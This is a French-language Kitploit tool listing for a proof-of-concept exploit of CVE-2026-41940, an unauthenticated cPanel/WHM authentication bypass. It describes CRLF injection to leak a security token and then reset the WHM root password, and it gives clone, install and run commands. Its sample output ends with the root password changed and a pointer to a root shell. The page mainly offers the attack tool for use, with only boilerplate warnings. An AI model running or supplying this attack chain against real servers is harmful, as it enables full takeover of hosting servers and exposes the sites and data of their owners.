Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-41940 — Preuve de concept d'exploitation pour CVE-2026-41940, un contournement d'authentification non authentifié dans cPanel/WHM utilisant une injection CRLF pour divulguer les jetons de sécurité et réinitialiser le mot de passe root. | Kitploit
Outils/GitHubGitHub/rosemary1337/cve-2026-41940
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubrosemary1337/cve-2026-41940

CVE-2026-41940

Preuve de concept d'exploitation pour CVE-2026-41940, un contournement d'authentification non authentifié dans cPanel/WHM utilisant une injection CRLF pour divulguer les jetons de sécurité et réinitialiser le mot de passe root.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 3 moisPas encore vérifié

CVE-2026-41940 Exploit Automatique

Python Status Author


Aperçu

CVE-2026-41940 est un exploit de preuve de concept (PoC) ciblant cPanel/WHM.
Cet exploit démontre un contournement d'authentification non authentifié utilisant une injection CRLF pour fuiter des jetons de sécurité et obtenir un accès de niveau root à l'interface WHM, permettant des actions telles que la modification du mot de passe root.

Avertissement : Ce PoC est à des fins éducatives uniquement. Ne pas l'utiliser sur des systèmes sans autorisation.


Fonctionnalités

  • Découverte automatique du nom d'hôte : Identifie automatiquement le nom d'hôte canonique pour contourner les restrictions de l'en-tête Host.
  • Création de session pré-authentification : Génère une session initiale valide pour l'injection.
  • Injection CRLF : Exploite l'injection dans les en-têtes pour fuiter le cp_security_token.
  • Propagation de session : Force le jeton fuité dans le cache d'authentification du serveur.
  • Réinitialisation du mot de passe root : Modifie automatiquement le mot de passe root WHM en cas de contournement réussi.
  • Dépendances minimales : Fonctionne avec la bibliothèque standard requests.

Installation

  1. Clonez le dépôt :
root@kitploit:~
git clone https://github.com/Rosemary1337/CVE-2026-41940.git
cd CVE-2026-41940
  1. Installez les dépendances :
root@kitploit:~
pip install requests

Prérequis : requests, urllib3


Utilisation

root@kitploit:~
python3 CVE_2026_41940.py --target <URL_CIBLE> --password <NOUVEAU_MOT_DE_PASSE>

Exemple :

root@kitploit:~
python3 CVE_2026_41940.py --target https://target.com:2087 --password MyNewRootPass123!

Arguments


Sortie

La console affiche :

  • Messages de statut [0-4]
  • Succès [+]
  • Échec [!]
  • Informations [*]

Exemple :

root@kitploit:~
[0] hostname = target.local
[1] minting a preauth session...
    session base = :XLNfFj4XjKuS4f9V
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    HTTP 307, leaked token = /cpsess0555762073
[3] firing do_token_denied to propagate raw -> cache...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.110.0.12"}
[*] changing the root password
    passwd -> HTTP 200
[+] now just login to https://target.com:2087 and use the terminal option to get a root shell

Sécurité et avertissement

  • À des fins éducatives et de test uniquement.
  • Ne pas attaquer des sites Web sans autorisation explicite.
  • À utiliser uniquement dans un laboratoire contrôlé ou un test d'intrusion autorisé.
Télécharger l’outil
FlagDescriptionRequisDéfaut
--targetURL cible WHM (ex. : https://host:2087)Oui-
--passwordNouveau mot de passe pour l'utilisateur rootOui-
--hostnameRemplacer l'en-tête Host:NonAuto